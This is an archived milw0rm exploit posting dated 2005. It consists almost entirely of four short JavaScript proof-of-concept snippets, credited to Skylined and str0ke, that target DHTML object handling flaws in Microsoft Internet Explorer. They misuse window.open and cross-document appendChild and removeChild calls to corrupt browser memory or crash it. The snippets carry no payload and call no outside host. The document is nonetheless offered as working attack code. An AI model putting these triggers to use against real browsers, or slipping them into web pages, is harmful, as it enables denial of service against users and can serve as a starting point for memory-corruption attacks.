<!-- Here are multiple Microsoft Internet Explorer DHTML Object Handling Vulnerabilities by Skylined /str0ke -->

<SCRIPT language="javascript">
    a=document.createTextNode();try{window.open().document.appendChild(a);}catch(e){}document.removeChild(a);
</SCRIPT>

<SCRIPT language="javascript">
  p=document.createElement();c=window.open().document.createElement();try{c.appendChild(p);}catch(e){p.removeChild(c);};
</SCRIPT>

<SCRIPT language="javascript">
    try{window.open().document.appendChild(document);}catch(e){}
</SCRIPT>

<SCRIPT>
    try{window.open().document.appendChild(document.all[0]);}catch(e){}
</SCRIPT>

# milw0rm.com [2005-04-12]
